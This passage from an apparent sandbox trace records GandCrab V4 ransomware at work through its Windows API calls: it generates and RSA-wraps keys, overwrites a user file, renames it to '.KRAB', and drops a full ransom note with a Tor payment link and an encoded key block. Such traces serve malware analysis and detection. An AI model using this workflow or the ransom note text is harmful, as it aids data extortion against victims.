lpString2="KRAB-DECRYPT.html") returned 1 [0076.502] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="KRAB-DECRYPT.txt") returned 1 [0076.502] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="CRAB-DECRYPT.txt") returned 1 [0076.502] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="ntldr") returned -1 [0076.502] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="NTDETECT.COM") returned -1 [0076.502] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="Bootfont.bin") returned 1 [0076.502] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.502] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010c60) returned 1 [0076.515] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0076.516] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0076.516] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0076.516] CryptGenRandom (in: hProv=0x1010c60, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0076.516] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0076.516] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.517] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011018) returned 1 [0076.533] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3010000 [0076.534] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0076.534] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0076.534] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0076.534] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0076.534] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.535] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010f08) returned 1 [0076.538] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1023378) returned 1 [0076.538] CryptGetKeyParam (in: hKey=0x1023378, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0076.538] CryptEncrypt (in: hKey=0x1023378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0076.538] GetLastError () returned 0x0 [0076.539] CryptDestroyKey (hKey=0x1023378) returned 1 [0076.539] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0076.539] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011348) returned 1 [0076.542] CryptImportKey (in: hProv=0x1011348, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10231b8) returned 1 [0076.542] CryptGetKeyParam (in: hKey=0x10231b8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0076.542] CryptEncrypt (in: hKey=0x10231b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0076.543] GetLastError () returned 0x0 [0076.543] CryptDestroyKey (hKey=0x10231b8) returned 1 [0076.543] CryptReleaseContext (hProv=0x1011348, dwFlags=0x0) returned 1 [0076.543] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MKJULoiV-xwixtoGWVo.odp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mkjuloiv-xwixtogwvo.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0076.543] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0076.543] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0076.544] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x2e55, lpOverlapped=0x0) returned 1 [0076.556] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffd1ab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.556] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2e55, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x2e55, lpOverlapped=0x0) returned 1 [0076.557] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0076.557] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.565] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.565] CloseHandle (hObject=0x3a8) returned 1 [0076.566] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.566] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MKJULoiV-xwixtoGWVo.odp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mkjuloiv-xwixtogwvo.odp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MKJULoiV-xwixtoGWVo.odp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mkjuloiv-xwixtogwvo.odp.krab")) returned 1 [0076.567] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.567] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0076.567] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0076.567] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0076.568] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Mozilla" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla" [0076.568] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\" [0076.568] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.568] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0076.568] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0076.568] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0076.568] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0076.568] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.568] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.569] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\\\KRAB-DECRYPT.txt") returned 63 [0076.569] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0076.569] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0076.570] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0076.570] CloseHandle (hObject=0x3a8) returned 1 [0076.571] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.571] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.571] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x2fe)) [0076.571] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.572] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0076.572] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.572] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a08d2ca4dee3d.lock") returned 69 [0076.572] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0076.574] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.574] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.575] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\") returned 46 [0076.575] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\*" [0076.575] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0x1023378 [0076.575] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.575] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0076.575] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.575] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.575] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0076.575] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0076.575] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0076.575] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a08d2ca4dee3d.lock" [0076.575] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.576] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 74 [0076.576] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\d2ca4a08d2ca4dee3d.lock") returned 69 [0076.576] lstrlenW (lpString=".lock") returned 5 [0076.576] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.576] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0076.576] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.577] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.577] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0076.577] lstrcmpW (lpString1="Extensions", lpString2=".") returned 1 [0076.577] lstrcmpW (lpString1="Extensions", lpString2="..") returned 1 [0076.577] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\", lpString2="Extensions" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions" [0076.577] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\" [0076.577] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.577] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0076.578] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0076.578] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0076.578] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0076.578] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.578] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.578] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\\\KRAB-DECRYPT.txt") returned 74 [0076.579] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\extensions\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0076.579] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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